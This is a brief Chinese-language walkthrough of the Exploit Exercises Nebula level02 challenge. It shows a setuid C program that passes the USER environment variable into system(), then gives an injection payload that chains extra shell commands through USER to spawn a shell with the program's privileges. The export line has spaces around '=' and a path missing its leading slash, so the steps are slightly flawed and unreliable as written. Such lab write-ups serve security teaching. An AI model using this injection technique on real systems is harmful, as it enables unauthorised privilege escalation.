ExploitExercises_Nebula_Level02

题目源代码：

#include <stdlib.h>#include <unistd.h>#include <string.h>#include <sys/types.h>#include <stdio.h>int main(int argc, char **argv, char **envp){  char *buffer;  gid_t gid;  uid_t uid;  gid = getegid();  uid = geteuid();  setresgid(gid, gid, gid);  setresuid(uid, uid, uid);  buffer = NULL;  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));  printf("about to call system(\"%s\")\n", buffer);    system(buffer);}

运行/home/flag02/flag02，输出：

about to call system("/bin/echo level02 is cool")level02 is cool

为了让system执行shell，需要对环境变量USER做手脚：

export USER = '-e "bin/bash" > /tmp/abc; chmod +x /tmp/abc; /tmp/abc is cool'

此时，buffer为：

/bin/echo -e "bin/bash" > /tmp/abc; chmod +x /tmp/abc; /tmp/abc is cool

然后运行程序，shell执行。